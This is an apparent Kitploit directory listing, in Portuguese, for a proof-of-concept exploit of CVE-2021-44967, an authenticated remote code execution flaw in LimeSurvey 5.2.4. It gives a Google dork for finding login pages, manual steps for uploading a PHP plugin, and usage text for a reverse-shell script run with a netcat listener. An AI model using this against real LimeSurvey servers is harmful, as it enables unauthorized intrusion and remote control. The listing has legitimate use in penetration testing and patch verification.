Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44967 — Exploit de POC para CVE-2021-44967 | Kitploit
Ferramentas/GitHubGitHub/d3ext/cve-2021-44967
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubd3ext/cve-2021-44967

CVE-2021-44967

Exploit de POC para CVE-2021-44967

Ver Repositório
6há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

Explicação

Existe uma vulnerabilidade de Execução Remota de Código (RCE) no LimeSurvey 5.2.4 através da função de carregamento e instalação de plugins, que pode permitir que um utilizador remoto malicioso carregue um ficheiro de código PHP arbitrário.

Estes são os passos para explorar esta vulnerabilidade manualmente:

  1. Criar um ZIP contendo o ficheiro PHP e o ficheiro de configuração
  2. Fazer login no LimeSurvey
  3. Ir para Configuração -> Plugins -> Carregar e Instalar
  4. Carregar o seu ficheiro ZIP
  5. Instalá-lo
  6. Finalmente, ativar o seu plugin
  7. Então o seu código PHP deve estar acessível em /upload/plugins/<plugin_name>/<php_file>

Utilização

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

Inicie um listener netcat e depois execute o exploit desta forma:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

Demonstração

Referências

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

Licença

Este projeto está sob licença MIT

Copyright © 2025, D3Ext

Baixar ferramenta